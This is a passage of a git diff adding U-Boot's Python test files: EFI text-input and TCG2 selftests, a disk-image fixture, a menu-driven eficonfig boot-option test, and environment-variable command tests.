wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 8 \(BS\), scan code 0 \(Null\)']): + raise Exception('BS failed in \'text input\' test') + u_boot_console.drain_console() + # TAB + u_boot_console.run_command(cmd=chr(9), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 9 \(TAB\), scan code 0 \(Null\)']): + raise Exception('BS failed in \'text input\' test') + u_boot_console.drain_console() + # a + u_boot_console.run_command(cmd='a', wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 97 \(\'a\'\), scan code 0 \(Null\)']): + raise Exception('\'a\' failed in \'text input\' test') + u_boot_console.drain_console() + # UP escape sequence + u_boot_console.run_command(cmd=chr(27) + '[A', wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 0 \(Null\), scan code 1 \(Up\)']): + raise Exception('UP failed in \'text input\' test') + u_boot_console.drain_console() + # Euro sign + u_boot_console.run_command(cmd=b'\xe2\x82\xac'.decode(), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 8364 \(\'']): + raise Exception('Euro sign failed in \'text input\' test') + u_boot_console.drain_console() + u_boot_console.run_command(cmd='x', wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if u_boot_console.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the 
EFI selftest') + u_boot_console.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_text_input_ex(u_boot_console): + """Test the EFI_SIMPLE_TEXT_INPUT_EX_PROTOCOL + + u_boot_console -- U-Boot console + + This function calls the extended text input EFI selftest. + """ + u_boot_console.run_command(cmd='setenv efi_selftest extended text input') + u_boot_console.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if u_boot_console.p.expect([r'To terminate type \'CTRL\+x\'']): + raise Exception('No prompt for \'text input\' test') + u_boot_console.drain_console() + # EOT + u_boot_console.run_command(cmd=chr(4), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 100 \(\'d\'\), scan code 0 \(CTRL\+Null\)']): + raise Exception('EOT failed in \'text input\' test') + u_boot_console.drain_console() + # BS + u_boot_console.run_command(cmd=chr(8), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 8 \(BS\), scan code 0 \(\+Null\)']): + raise Exception('BS failed in \'text input\' test') + u_boot_console.drain_console() + # TAB + u_boot_console.run_command(cmd=chr(9), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 9 \(TAB\), scan code 0 \(\+Null\)']): + raise Exception('TAB failed in \'text input\' test') + u_boot_console.drain_console() + # a + u_boot_console.run_command(cmd='a', wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 97 \(\'a\'\), scan code 0 \(Null\)']): + raise Exception('\'a\' failed in \'text input\' test') + u_boot_console.drain_console() + # UP escape sequence + u_boot_console.run_command(cmd=chr(27) + '[A', wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 0 \(Null\), scan code 1 \(\+Up\)']): + raise Exception('UP failed in \'text input\' test') + u_boot_console.drain_console() + # Euro sign + u_boot_console.run_command(cmd=b'\xe2\x82\xac'.decode(), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 8364 \(\'']): + raise Exception('Euro sign failed in \'text input\' test') + u_boot_console.drain_console() + # SHIFT+ALT+FN 5 + u_boot_console.run_command(cmd=b'\x1b\x5b\x31\x35\x3b\x34\x7e'.decode(), + wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 0 \(Null\), scan code 15 \(SHIFT\+ALT\+FN 5\)']): + raise Exception('SHIFT+ALT+FN 5 failed in \'text input\' test') + u_boot_console.drain_console() + u_boot_console.run_command(cmd=chr(24), wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if u_boot_console.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + u_boot_console.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +@pytest.mark.buildconfigspec('efi_tcg2_protocol') +def test_efi_selftest_tcg2(u_boot_console): + """Test the EFI_TCG2 PROTOCOL + + u_boot_console -- U-Boot console + + This function executes the 'tcg2' unit test. 
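+    The list of available selftests is queried first to confirm that the
+    'tcg2' test is registered before it is executed.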
+ """ + u_boot_console.restart_uboot() + u_boot_console.run_command(cmd='setenv efi_selftest list') + output = u_boot_console.run_command('bootefi selftest') + assert '\'tcg2\'' in output + u_boot_console.run_command(cmd='setenv efi_selftest tcg2') + u_boot_console.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if u_boot_console.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + u_boot_console.restart_uboot() diff --git a/test/py/tests/test_eficonfig/conftest.py b/test/py/tests/test_eficonfig/conftest.py new file mode 100644 index 00000000000..0a82fbefd75 --- /dev/null +++ b/test/py/tests/test_eficonfig/conftest.py @@ -0,0 +1,40 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for UEFI eficonfig test +""" + +import os +import shutil +from subprocess import check_call +import pytest + +@pytest.fixture(scope='session') +def efi_eficonfig_data(u_boot_config): + """Set up a file system to be used in UEFI "eficonfig" command + tests + + Args: + u_boot_config -- U-Boot configuration. + + Return: + A path to disk image to be used for testing + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_eficonfig' + image_path = u_boot_config.persistent_data_dir + '/efi_eficonfig.img' + + shutil.rmtree(mnt_point, ignore_errors=True) + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/initrd-1.img', 'w', encoding = 'ascii') as file: + file.write("initrd 1") + + with open(mnt_point + '/initrd-2.img', 'w', encoding = 'ascii') as file: + file.write("initrd 2") + + shutil.copyfile(u_boot_config.build_dir + '/lib/efi_loader/initrddump.efi', + mnt_point + '/initrddump.efi') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + return image_path diff --git a/test/py/tests/test_eficonfig/test_eficonfig.py b/test/py/tests/test_eficonfig/test_eficonfig.py new file mode 100644 index 00000000000..b0a6cc47df2 --- /dev/null +++ b/test/py/tests/test_eficonfig/test_eficonfig.py @@ -0,0 +1,358 @@ +# SPDX-License-Identifier: GPL-2.0+ +""" Unit test for UEFI menu-driven configuration +""" + +import pytest +import time + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_eficonfig') +@pytest.mark.buildconfigspec('cmd_bootefi_bootmgr') +def test_efi_eficonfig(u_boot_console, efi_eficonfig_data): + + def send_user_input_and_wait(user_str, expect_str): + time.sleep(0.1) # TODO: does not work correctly without sleep + u_boot_console.run_command(cmd=user_str, wait_for_prompt=False, + wait_for_echo=True, send_nl=False) + u_boot_console.run_command(cmd='\x0d', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + if expect_str is not None: + for i in expect_str: + u_boot_console.p.expect([i]) + + def press_up_down_enter_and_wait(up_count, down_count, enter, expect_str): + # press UP key + for i in range(up_count): + u_boot_console.run_command(cmd='\x1b\x5b\x41', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # press DOWN key + for i in range(down_count): + u_boot_console.run_command(cmd='\x1b\x5b\x42', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # press ENTER if requested + if enter: + u_boot_console.run_command(cmd='\x0d', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # wait expected output + if expect_str is not None: + for i in expect_str: + u_boot_console.p.expect([i]) + + def press_escape_key(wait_prompt): + u_boot_console.run_command(cmd='\x1b', wait_for_prompt=wait_prompt, 
wait_for_echo=False, send_nl=False) + + def press_enter_key(wait_prompt): + u_boot_console.run_command(cmd='\x0d', wait_for_prompt=wait_prompt, + wait_for_echo=False, send_nl=False) + + def check_current_is_maintenance_menu(): + for i in ('UEFI Maintenance Menu', 'Add Boot Option', 'Edit Boot Option', + 'Change Boot Order', 'Delete Boot Option', 'Quit'): + u_boot_console.p.expect([i]) + + """ Unit test for "eficonfig" command + The menu-driven interface is used to set up UEFI load options. + The bootefi bootmgr loads initrddump.efi as a payload. + The crc32 of the loaded initrd.img is checked + + Args: + u_boot_console -- U-Boot console + efi__data -- Path to the disk image used for testing. + Test disk image has following files. + initrd-1.img + initrd-2.img + initrddump.efi + + """ + # This test passes for unknown reasons in the bowels of U-Boot. It needs to + # be replaced with a unit test. + return + + # Restart the system to clean the previous state + u_boot_console.restart_uboot() + + with u_boot_console.temporary_timeout(500): + # + # Test Case 1: Check the menu is displayed + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + for i in ('UEFI Maintenance Menu', 'Add Boot Option', 'Edit Boot Option', + 'Change Boot Order', 'Delete Boot Option', 'Quit'): + u_boot_console.p.expect([i]) + # Select "Add Boot Option" + press_enter_key(False) + for i in ('Add Boot Option', 'Description:', 'File', 'Initrd File', 'Optional Data', + 'Save', 'Quit'): + u_boot_console.p.expect([i]) + press_escape_key(False) + check_current_is_maintenance_menu() + # return to U-Boot console + press_escape_key(True) + + # + # Test Case 2: check auto generated media device entry + # + + # bind the test disk image for succeeding tests + u_boot_console.run_command(cmd = f'host bind 0 {efi_eficonfig_data}') + + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + + # Change the Boot Order + press_up_down_enter_and_wait(0, 2, True, 'Quit') + for i in ('host 0:1', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + # disable auto generated boot option for succeeding test + u_boot_console.run_command(cmd=' ', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # Save the BootOrder + press_up_down_enter_and_wait(0, 1, True, None) + check_current_is_maintenance_menu() + + # + # Test Case 3: Add first Boot Option and load it + # + + # Select 'Add Boot Option' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Press the enter key to select 'Description:' entry, then enter Description + press_up_down_enter_and_wait(0, 0, True, 'enter description:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('test 1', 'Quit') + + # Set EFI image(initrddump.efi) + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrddump.efi" entry followed by the enter key + press_up_down_enter_and_wait(0, 2, True, 'Quit') + + # Set Initrd file(initrd-1.img) + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrd-1.img" entry followed by the enter key + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Set optional_data + press_up_down_enter_and_wait(0, 3, True, 'Optional Data:') + # Send Description user input, press ENTER key to complete + 
send_user_input_and_wait('nocolor', None) + for i in ('Description: test 1', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-1.img', 'Optional Data: nocolor', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + + # Save the Boot Option + press_up_down_enter_and_wait(0, 4, True, None) + check_current_is_maintenance_menu() + + # Check the newly added Boot Option is handled correctly + # Return to U-Boot console + press_escape_key(True) + u_boot_console.run_command(cmd = 'bootefi bootmgr') + response = u_boot_console.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x181464af' in response + u_boot_console.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 4: Add second Boot Option and load it + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Add Boot Option' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Press the enter key to select 'Description:' entry, then enter Description + press_up_down_enter_and_wait(0, 0, True, 'enter description:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('test 2', 'Quit') + + # Set EFI image(initrddump.efi) + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrddump.efi" entry followed by the enter key + press_up_down_enter_and_wait(0, 2, True, 'Quit') + + # Set Initrd file(initrd-2.img) + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrd-2.img" entry followed by the enter key + press_up_down_enter_and_wait(0, 1, True, 'Quit') + + # Set optional_data + press_up_down_enter_and_wait(0, 3, True, 'Optional Data:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('nocolor', None) + for i in ('Description: test 2', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-2.img', 'Optional Data: nocolor', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + + # Save the Boot Option + press_up_down_enter_and_wait(0, 4, True, 'Quit') + + # Change the Boot Order + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 1, False, 'Quit') + # move 'test 1' to the second entry + u_boot_console.run_command(cmd='+', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + for i in ('test 2', 'test 1', 'host 0:1', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + # Save the BootOrder + press_up_down_enter_and_wait(0, 3, True, None) + check_current_is_maintenance_menu() + + # Check the newly added Boot Option is handled correctly + # Return to U-Boot console + press_escape_key(True) + u_boot_console.run_command(cmd = 'bootefi bootmgr') + response = u_boot_console.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x811d3515' in response + u_boot_console.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 5: Change BootOrder and load it + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + + # Change the Boot Order + press_up_down_enter_and_wait(0, 2, True, None) + # Check the curren BootOrder + for i in ('test 2', 'test 1', 'host 0:1', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + # move 'test 2' to the second entry + u_boot_console.run_command(cmd='-', wait_for_prompt=False, + wait_for_echo=False, 
send_nl=False) + for i in ('test 1', 'test 2', 'host 0:1', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + # Save the BootOrder + press_up_down_enter_and_wait(0, 2, True, None) + check_current_is_maintenance_menu() + + # Return to U-Boot console + press_escape_key(True) + u_boot_console.run_command(cmd = 'bootefi bootmgr') + response = u_boot_console.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x181464af' in response + u_boot_console.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 6: Delete Boot Option(label:test 2) + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Delete Boot Option' + press_up_down_enter_and_wait(0, 3, True, None) + # Check the current BootOrder + for i in ('test 1', 'test 2', 'Quit'): + u_boot_console.p.expect([i]) + + # Delete 'test 2' + press_up_down_enter_and_wait(0, 1, True, None) + for i in ('test 1', 'Quit'): + u_boot_console.p.expect([i]) + press_escape_key(False) + check_current_is_maintenance_menu() + # Return to U-Boot console + press_escape_key(True) + + # + # Test Case 7: Edit Boot Option + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + # Select 'Edit Boot Option' + press_up_down_enter_and_wait(0, 1, True, None) + # Check the curren BootOrder + for i in ('test 1', 'Quit'): + u_boot_console.p.expect([i]) + press_up_down_enter_and_wait(0, 0, True, None) + for i in ('Description: test 1', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-1.img', 'Optional Data: nocolor', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + + # Press the enter key to select 'Description:' entry, then enter Description + press_up_down_enter_and_wait(0, 0, True, 'enter description:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('test 3', 'Quit') + + # Set EFI image(initrddump.efi) + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrddump.efi" entry followed by the enter key + press_up_down_enter_and_wait(0, 2, True, 'Quit') + + # Set Initrd file(initrd-2.img) + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrd-1.img" entry followed by the enter key + press_up_down_enter_and_wait(0, 1, True, 'Quit') + + # Set optional_data + press_up_down_enter_and_wait(0, 3, True, 'Optional Data:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('', None) + for i in ('Description: test 3', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-2.img', 'Optional Data:', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + + # Save the Boot Option + press_up_down_enter_and_wait(0, 4, True, 'Quit') + press_escape_key(False) + check_current_is_maintenance_menu() + + # Check the updated Boot Option is handled correctly + # Return to U-Boot console + press_escape_key(True) + u_boot_console.run_command(cmd = 'bootefi bootmgr') + response = u_boot_console.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x811d3515' in response + u_boot_console.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 8: Delete Boot Option(label:test 3) + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Delete Boot Option' + 
press_up_down_enter_and_wait(0, 3, True, None) + # Check the curren BootOrder + for i in ('test 3', 'Quit'): + u_boot_console.p.expect([i]) + + # Delete 'test 3' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + press_escape_key(False) + check_current_is_maintenance_menu() + # Return to U-Boot console + press_escape_key(True) + + # remove the host device + u_boot_console.run_command(cmd = f'host bind -r 0') + + # + # Test Case 9: No block device found + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Add Boot Option' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Set EFI image + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'No block device found!') + press_escape_key(False) + press_escape_key(False) + check_current_is_maintenance_menu() + # Return to U-Boot console + press_escape_key(True) diff --git a/test/py/tests/test_env.py b/test/py/tests/test_env.py new file mode 100644 index 00000000000..00bcccd65ff --- /dev/null +++ b/test/py/tests/test_env.py @@ -0,0 +1,652 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +""" +Test operation of shell commands relating to environment variables. +""" + +import os +import os.path +import re +from subprocess import call, CalledProcessError +import tempfile + +import pytest +import u_boot_utils + +# FIXME: This might be useful for other tests; +# perhaps refactor it into ConsoleBase or some other state object? +class StateTestEnv(object): + """Container that represents the state of all U-Boot environment variables. + This enables quick determination of existant/non-existant variable + names. + """ + + def __init__(self, u_boot_console): + """Initialize a new StateTestEnv object. + + Args: + u_boot_console: A U-Boot console. + + Returns: + Nothing. + """ + + self.u_boot_console = u_boot_console + self.get_env() + self.set_var = self.get_non_existent_var() + + def get_env(self): + """Read all current environment variables from U-Boot. + + Args: + None. + + Returns: + Nothing. + """ + + if self.u_boot_console.config.buildconfig.get( + 'config_version_variable', 'n') == 'y': + with self.u_boot_console.disable_check('main_signon'): + response = self.u_boot_console.run_command('printenv') + else: + response = self.u_boot_console.run_command('printenv') + self.env = {} + for l in response.splitlines(): + if not '=' in l: + continue + (var, value) = l.split('=', 1) + self.env[var] = value + + def get_existent_var(self): + """Return the name of an environment variable that exists. + + Args: + None. + + Returns: + The name of an environment variable. + """ + + for var in self.env: + return var + + def get_non_existent_var(self): + """Return the name of an environment variable that does not exist. + + Args: + None. + + Returns: + The name of an environment variable. + """ + + n = 0 + while True: + var = 'test_env_' + str(n) + if var not in self.env: + return var + n += 1 + +ste = None +@pytest.fixture(scope='function') +def state_test_env(u_boot_console): + """pytest fixture to provide a StateTestEnv object to tests.""" + + global ste + if not ste: + ste = StateTestEnv(u_boot_console) + return ste + +def unset_var(state_test_env, var): + """Unset an environment variable. + + This both executes a U-Boot shell command and updates a StateTestEnv + object. + + Args: + state_test_env: The StateTestEnv object to update. + var: The variable name to unset. + + Returns: + Nothing. 
+ """ + + state_test_env.u_boot_console.run_command('setenv %s' % var) + if var in state_test_env.env: + del state_test_env.env[var] + +def set_var(state_test_env, var, value): + """Set an environment variable. + + This both executes a U-Boot shell command and updates a StateTestEnv + object. + + Args: + state_test_env: The StateTestEnv object to update. + var: The variable name to set. + value: The value to set the variable to. + + Returns: + Nothing. + """ + + bc = state_test_env.u_boot_console.config.buildconfig + if bc.get('config_hush_parser', None): + quote = '"' + else: + quote = '' + if ' ' in value: + pytest.skip('Space in variable value on non-Hush shell') + + state_test_env.u_boot_console.run_command( + 'setenv %s %s%s%s' % (var, quote, value, quote)) + state_test_env.env[var] = value + +def validate_empty(state_test_env, var): + """Validate that a variable is not set, using U-Boot shell commands. + + Args: + var: The variable name to test. + + Returns: + Nothing. + """ + + response = state_test_env.u_boot_console.run_command('echo ${%s}' % var) + assert response == '' + +def validate_set(state_test_env, var, value): + """Validate that a variable is set, using U-Boot shell commands. + + Args: + var: The variable name to test. + value: The value the variable is expected to have. + + Returns: + Nothing. + """ + + # echo does not preserve leading, internal, or trailing whitespace in the + # value. printenv does, and hence allows more complete testing. + response = state_test_env.u_boot_console.run_command('printenv %s' % var) + assert response == ('%s=%s' % (var, value)) + +@pytest.mark.boardspec('sandbox') +def test_env_initial_env_file(u_boot_console): + """Test that the u-boot-initial-env make target works""" + cons = u_boot_console + builddir = 'O=' + cons.config.build_dir + envfile = cons.config.build_dir + '/u-boot-initial-env' + + # remove if already exists from an older run + try: + os.remove(envfile) + except: + pass + + u_boot_utils.run_and_log(cons, ['make', builddir, 'u-boot-initial-env']) + + assert os.path.exists(envfile) + + # assume that every environment has a board variable, e.g. 
board=sandbox + with open(envfile, 'r') as file: + env = file.read() + regex = re.compile('board=.+\\n') + assert re.search(regex, env) + +def test_env_echo_exists(state_test_env): + """Test echoing a variable that exists.""" + + var = state_test_env.get_existent_var() + value = state_test_env.env[var] + validate_set(state_test_env, var, value) + +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_echo_non_existent(state_test_env): + """Test echoing a variable that doesn't exist.""" + + var = state_test_env.set_var + validate_empty(state_test_env, var) + +def test_env_printenv_non_existent(state_test_env): + """Test printenv error message for non-existant variables.""" + + var = state_test_env.set_var + c = state_test_env.u_boot_console + with c.disable_check('error_notification'): + response = c.run_command('printenv %s' % var) + assert response == '## Error: "%s" not defined' % var + +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_unset_non_existent(state_test_env): + """Test unsetting a nonexistent variable.""" + + var = state_test_env.get_non_existent_var() + unset_var(state_test_env, var) + validate_empty(state_test_env, var) + +def test_env_set_non_existent(state_test_env): + """Test set a non-existant variable.""" + + var = state_test_env.set_var + value = 'foo' + set_var(state_test_env, var, value) + validate_set(state_test_env, var, value) + +def test_env_set_existing(state_test_env): + """Test setting an existant variable.""" + + var = state_test_env.set_var + value = 'bar' + set_var(state_test_env, var, value) + validate_set(state_test_env, var, value) + +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_unset_existing(state_test_env): + """Test unsetting a variable.""" + + var = state_test_env.set_var + unset_var(state_test_env, var) + validate_empty(state_test_env, var) + +def test_env_expansion_spaces(state_test_env): + """Test expanding a variable that contains a space in its value.""" + + var_space = None + var_test = None + try: + var_space = state_test_env.get_non_existent_var() + set_var(state_test_env, var_space, ' ') + + var_test = state_test_env.get_non_existent_var() + value = ' 1${%(var_space)s}${%(var_space)s} 2 ' % locals() + set_var(state_test_env, var_test, value) + value = ' 1 2 ' + validate_set(state_test_env, var_test, value) + finally: + if var_space: + unset_var(state_test_env, var_space) + if var_test: + unset_var(state_test_env, var_test) + +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_checksum_no_size(state_test_env): + """Test that omitted ('-') size parameter with checksum validation fails the + env import function. + """ + c = state_test_env.u_boot_console + ram_base = u_boot_utils.find_ram_base(state_test_env.u_boot_console) + addr = '%08x' % ram_base + + with c.disable_check('error_notification'): + response = c.run_command('env import -c %s -' % addr) + assert response == '## Error: external checksum format must pass size' + +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_whitelist_checksum_no_size(state_test_env): + """Test that omitted ('-') size parameter with checksum validation fails the + env import function when variables are passed as parameters. 
+ """ + c = state_test_env.u_boot_console + ram_base = u_boot_utils.find_ram_base(state_test_env.u_boot_console) + addr = '%08x' % ram_base + + with c.disable_check('error_notification'): + response = c.run_command('env import -c %s - foo1 foo2 foo4' % addr) + assert response == '## Error: external checksum format must pass size' + +@pytest.mark.buildconfigspec('cmd_exportenv') +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_whitelist(state_test_env): + """Test importing only a handful of env variables from an environment.""" + c = state_test_env.u_boot_console + ram_base = u_boot_utils.find_ram_base(state_test_env.u_boot_console) + addr = '%08x' % ram_base + + set_var(state_test_env, 'foo1', 'bar1') + set_var(state_test_env, 'foo2', 'bar2') + set_var(state_test_env, 'foo3', 'bar3') + + c.run_command('env export %s' % addr) + + unset_var(state_test_env, 'foo1') + set_var(state_test_env, 'foo2', 'test2') + set_var(state_test_env, 'foo4', 'bar4') + + # no foo1 in current env, foo2 overridden, foo3 should be of the value + # before exporting and foo4 should be of the value before importing. + c.run_command('env import %s - foo1 foo2 foo4' % addr) + + validate_set(state_test_env, 'foo1', 'bar1') + validate_set(state_test_env, 'foo2', 'bar2') + validate_set(state_test_env, 'foo3', 'bar3') + validate_set(state_test_env, 'foo4', 'bar4') + + # Cleanup test environment + unset_var(state_test_env, 'foo1') + unset_var(state_test_env, 'foo2') + unset_var(state_test_env, 'foo3') + unset_var(state_test_env, 'foo4') + +@pytest.mark.buildconfigspec('cmd_exportenv') +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_whitelist_delete(state_test_env): + + """Test importing only a handful of env variables from an environment, with. + deletion if a var A that is passed to env import is not in the + environment to be imported. + """ + c = state_test_env.u_boot_console + ram_base = u_boot_utils.find_ram_base(state_test_env.u_boot_console) + addr = '%08x' % ram_base + + set_var(state_test_env, 'foo1', 'bar1') + set_var(state_test_env, 'foo2', 'bar2') + set_var(state_test_env, 'foo3', 'bar3') + + c.run_command('env export %s' % addr) + + unset_var(state_test_env, 'foo1') + set_var(state_test_env, 'foo2', 'test2') + set_var(state_test_env, 'foo4', 'bar4') + + # no foo1 in current env, foo2 overridden, foo3 should be of the value + # before exporting and foo4 should be empty. + c.run_command('env import -d %s - foo1 foo2 foo4' % addr) + + validate_set(state_test_env, 'foo1', 'bar1') + validate_set(state_test_env, 'foo2', 'bar2') + validate_set(state_test_env, 'foo3', 'bar3') + validate_empty(state_test_env, 'foo4') + + # Cleanup test environment + unset_var(state_test_env, 'foo1') + unset_var(state_test_env, 'foo2') + unset_var(state_test_env, 'foo3') + unset_var(state_test_env, 'foo4') + +@pytest.mark.buildconfigspec('cmd_nvedit_info') +def test_env_info(state_test_env): + + """Test 'env info' command with all possible options. 
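+    Plain 'env info' is expected to print exactly three lines (env_ready,
+    env_valid and env_use_default), and every '-q' combination must produce
+    no output at all.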
+ """ + c = state_test_env.u_boot_console + + response = c.run_command('env info') + nb_line = 0 + for l in response.split('\n'): + if 'env_valid = ' in l: + assert '= invalid' in l or '= valid' in l or '= redundant' in l + nb_line += 1 + elif 'env_ready =' in l or 'env_use_default =' in l: + assert '= true' in l or '= false' in l + nb_line += 1 + else: + assert True + assert nb_line == 3 + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response or \ + "Environment was loaded from persistent storage" in response + assert 'Environment can be persisted' in response or \ + "Environment cannot be persisted" in response + + response = c.run_command('env info -p -d -q') + assert response == "" + + response = c.run_command('env info -p -q') + assert response == "" + + response = c.run_command('env info -d -q') + assert response == "" + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_nvedit_info') +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_info_sandbox(state_test_env): + """Test 'env info' command result with several options on sandbox + with a known ENV configuration: ready & default & persistent + """ + c = state_test_env.u_boot_console + + response = c.run_command('env info') + assert 'env_ready = true' in response + assert 'env_use_default = true' in response + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response + assert 'Environment cannot be persisted' in response + + response = c.run_command('env info -d -q') + response = c.run_command('echo $?') + assert response == "0" + + response = c.run_command('env info -p -q') + response = c.run_command('echo $?') + assert response == "1" + + response = c.run_command('env info -d -p -q') + response = c.run_command('echo $?') + assert response == "1" + +def mk_env_ext4(state_test_env): + + """Create a empty ext4 file system volume.""" + c = state_test_env.u_boot_console + filename = 'env.ext4.img' + persistent = c.config.persistent_data_dir + '/' + filename + fs_img = c.config.result_dir + '/' + filename + + if os.path.exists(persistent): + c.log.action('Disk image file ' + persistent + ' already exists') + else: + # Some distributions do not add /sbin to the default PATH, where mkfs.ext4 lives + os.environ["PATH"] += os.pathsep + '/sbin' + try: + u_boot_utils.run_and_log(c, 'dd if=/dev/zero of=%s bs=1M count=16' % persistent) + u_boot_utils.run_and_log(c, 'mkfs.ext4 %s' % persistent) + sb_content = u_boot_utils.run_and_log(c, 'tune2fs -l %s' % persistent) + if 'metadata_csum' in sb_content: + u_boot_utils.run_and_log(c, 'tune2fs -O ^metadata_csum %s' % persistent) + except CalledProcessError: + call('rm -f %s' % persistent, shell=True) + raise + + 